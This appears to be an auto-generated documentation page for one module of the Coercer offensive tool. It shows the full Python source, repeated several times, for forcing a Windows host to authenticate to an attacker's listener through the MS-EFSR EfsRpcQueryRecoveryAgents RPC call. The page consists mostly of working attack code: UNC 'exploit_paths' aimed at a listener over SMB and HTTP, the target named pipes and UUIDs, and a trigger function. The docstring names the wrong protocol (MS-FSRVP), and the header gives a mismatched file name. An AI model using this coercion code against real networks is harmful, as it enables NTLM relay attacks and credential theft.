coercer.methods.MS_EFSR.EfsRpcQueryRecoveryAgents
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcOpenFileRaw.py 4# Author : Podalirius (@podalirius_) 5# Date created : 16 Sep 2022 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _EfsRpcQueryRecoveryAgents(NDRCALL): 15 """ 16 Structure to make the RPC call to EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 17 """ 18 opnum = 7 19 structure = ( 20 ('FileName', WSTR), # Type: wchar_t * 21 ) 22 23 24class _EfsRpcQueryRecoveryAgentsResponse(NDRCALL): 25 """ 26 Structure to parse the response of the RPC call to EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 27 """ 28 structure = () 29 30 31class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL): 32 """ 33 Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 34 35 Method found by: 36 - [@topotam77](https://twitter.com/topotam77) 37 """ 38 39 exploit_paths = [ 40 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 41 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 43 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 44 ] 45 46 access = { 47 "ncan_np": [ 48 { 49 "namedpipe": r"\PIPE\efsrpc", 50 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 51 "version": "1.0" 52 }, 53 { 54 "namedpipe": r"\PIPE\lsarpc", 55 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 56 "version": "1.0" 57 }, 58 { 59 "namedpipe": r"\PIPE\samr", 60 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 61 "version": "1.0" 62 }, 63 { 64 "namedpipe": r"\PIPE\lsass", 65 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 66 "version": "1.0" 67 }, 68 { 69 "namedpipe": r"\PIPE\netlogon", 70 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 71 "version": "1.0" 72 }, 73 ], 74 "ncacn_ip_tcp": [ 75 { 76 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 77 "version": "1.0" 78 }, 79 { 80 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 81 "version": "1.0" 82 } 83 ] 84 } 85 86 protocol = { 87 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 88 "shortname": "MS-EFSR" 89 } 90 91 function = { 92 "name": "EfsRpcQueryRecoveryAgents", 93 "opnum": 7, 94 "vulnerable_arguments": ["FileName"] 95 } 96 97 def trigger(self, dcerpc_session, target): 98 if dcerpc_session is not None: 99 try: 100 request = _EfsRpcQueryRecoveryAgents() 101 request['FileName'] = self.path 102 resp = dcerpc_session.request(request) 103 return "" 104 except Exception as err: 105 return err 106 else: 107 print("[!] Error: dce is None, you must call connect() first.") 108 return None
32class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL): 33 """ 34 Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 35 36 Method found by: 37 - [@topotam77](https://twitter.com/topotam77) 38 """ 39 40 exploit_paths = [ 41 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 42 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 44 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 45 ] 46 47 access = { 48 "ncan_np": [ 49 { 50 "namedpipe": r"\PIPE\efsrpc", 51 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 52 "version": "1.0" 53 }, 54 { 55 "namedpipe": r"\PIPE\lsarpc", 56 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 57 "version": "1.0" 58 }, 59 { 60 "namedpipe": r"\PIPE\samr", 61 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 62 "version": "1.0" 63 }, 64 { 65 "namedpipe": r"\PIPE\lsass", 66 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 67 "version": "1.0" 68 }, 69 { 70 "namedpipe": r"\PIPE\netlogon", 71 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 72 "version": "1.0" 73 }, 74 ], 75 "ncacn_ip_tcp": [ 76 { 77 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 78 "version": "1.0" 79 }, 80 { 81 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 82 "version": "1.0" 83 } 84 ] 85 } 86 87 protocol = { 88 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 89 "shortname": "MS-EFSR" 90 } 91 92 function = { 93 "name": "EfsRpcQueryRecoveryAgents", 94 "opnum": 7, 95 "vulnerable_arguments": ["FileName"] 96 } 97 98 def trigger(self, dcerpc_session, target): 99 if dcerpc_session is not None: 100 try: 101 request = _EfsRpcQueryRecoveryAgents() 102 request['FileName'] = self.path 103 resp = dcerpc_session.request(request) 104 return "" 105 except Exception as err: 106 return err 107 else: 108 print("[!] Error: dce is None, you must call connect() first.") 109 return None
Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of MS-FSRVP Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
98 def trigger(self, dcerpc_session, target): 99 if dcerpc_session is not None: 100 try: 101 request = _EfsRpcQueryRecoveryAgents() 102 request['FileName'] = self.path 103 resp = dcerpc_session.request(request) 104 return "" 105 except Exception as err: 106 return err 107 else: 108 print("[!] Error: dce is None, you must call connect() first.") 109 return None